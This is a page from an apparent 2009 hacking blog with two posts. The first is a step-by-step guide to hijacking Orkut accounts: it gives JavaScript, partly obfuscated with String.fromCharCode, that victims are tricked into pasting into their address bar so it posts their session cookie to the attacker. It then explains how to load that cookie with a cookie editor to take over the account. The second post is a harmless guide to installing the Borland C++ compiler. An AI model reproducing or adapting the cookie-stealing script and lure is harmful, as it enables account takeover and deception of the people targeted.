Showing posts with label Programming. Show all posts
Showing posts with label Programming. Show all posts

Dec 30, 2009

Hacking ORKUT By Cookie Stealing

I have mentioned about way of Hacking orkut account password by orkut phishing in my previous orkut account hacking articles. I was asked by many readers about how to hack orkut account password by cookie stealing method. So, i thought of informing you about method of hacking orkut account password using cookie stealing method in this security article.
Hacking orkut account by cookie stealing
Note : This trick of hacking orkut account password is no more working, due to recent updates by orkut.com. I was asked by many readers about this way of hacking orkut account and hence informing you. Keeping knowledge of this way of hacking orkut account will help you in future.

Hacking orkut account password:


1. Get Firefox and then Cookie editor firefox addon.

2. Here, you should have 2 Orkut accounts (Yep !). One for sending cookie script to victim and other to receive victim's orkut cookies.

3. Javascript to be sent to victim for hacking orkut account password :

javascript:nobody=replyForm;nobody.toUserId.value=33444211;
nobody.scrapText.value=document.cookie;nobody.action='scrapbook.aspx?
Action.submit';nobody.submit()


4. Now, replace the value in blue with your orkut album value. Right click on your photo and selecting Properties, you will get a 8-digit number (not available now due to recent fix by orkut.com) like say
55886645.jpg. Just replace "33444211" with "55886645" in above script.

5. The final script which you'll send to victim will look like :

javascript:nobody=replyForm;nobody.toUserId.value=yournumber;
nobody.scrapText.value=eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,99,111,111,107,105,101));
nobody.action='Scrapbook.aspx?Action.writeScrapBasic';nobody.submit()


6. Send this cookie script to one whose, you wanna hack orkut account and ask him to paste it in his address bar and hit enter.

7. You'll get his orkut account cookie in scrapbook. Now, go to your orkut homepage. Click Tools ->Cookie editor plugin. Now, click on Filter/ Refresh and look for "orkut_state". Double click it and replace this with victim script and put your eight digit number in place of "33444211".

8. Simply logout of your orkut account and login again. You'll be on victim homepage and hence, hacking orkut account...your aim of hacking orkut account completed.

So guys, this was the orkut hack used for hacking orkut accountby cookie stealing. This hack for hacking orkut account is reported to be fixed by orkut.com and hence no more working. Efforts are being taken to develop new ways of hacking orkut account. I will inform you about newly developed orkut hacks as they are out.
Read rest of entry

How to Compile C Programs

In many of my previous posts especially in the VIRUS CREATION section, I have used C as the programming language. If you’re new to C programming and find it difficult to compile the C source codes then this post is for you. Here is a step-by-step procedure to install Borland C++ compiler 5.5 and compile C programs.

How to install Borland C++ compiler

1. Download Borland C++ compiler 5.5 (for Windows platform) from the following link.
http://www.codegear.com/downloads/free/cppbuilder
2. After you download, run freecommandlinetools.exe. The default installation path would be
C:\Borland\BCC55

How to configure Borland C++ compiler

1. After you install Borland C++ compier, create two new Text Documents
2. Open the first New Text Document.txt file and add the following two lines into it
-I”c:\Borland\Bcc55\include”
-L”c:\Borland\Bcc55\lib”
Save changes and close the file. Now rename the file from New Text Document.txt to bcc32.cfg.
3. Open the second New Text Document (2).txt file and add the following line into it
-L”c:\Borland\Bcc55\lib”
Save changes and close the file. Now rename the file from New Text Document (2).txt to ilink32.cfg.
4. Now copy the two files bcc32.cfg and ilink32.cfg, navigate to C:\Borland\BCC55\Bin and paste them.

How to compile the C source code (.C files)

1. You need to place the .C (example.c) file to be compiled in the following location
C:\Borland\BCC55\Bin
2. Now goto command prompt (Start->Run->type cmd->Enter)
3. Make the following path as the present working directory (use CD command)
C:\Borland\BCC55\Bin
4. To compile the file (example.c) use the following command
bcc32 example.c
5. Now if there exists no error in the source code you’ll get an executable file (example.exe) in the same location (C:\Borland\BCC55\Bin).
6. Now you have successfully compiled the source code into an executable file(.exe file).
NOTE: The above tutorial assumes that you’ve installed the compiler onto the C: drive (by default).
Read rest of entry
 

IS THIS BLOG INTRESTING

Promote Your Blog

TECH & ETHICAL HACK TIPS Copyright © 2009 Gadget Blog is Designed by ADITYA Sponsored by HACKING AND CRACKING TIPS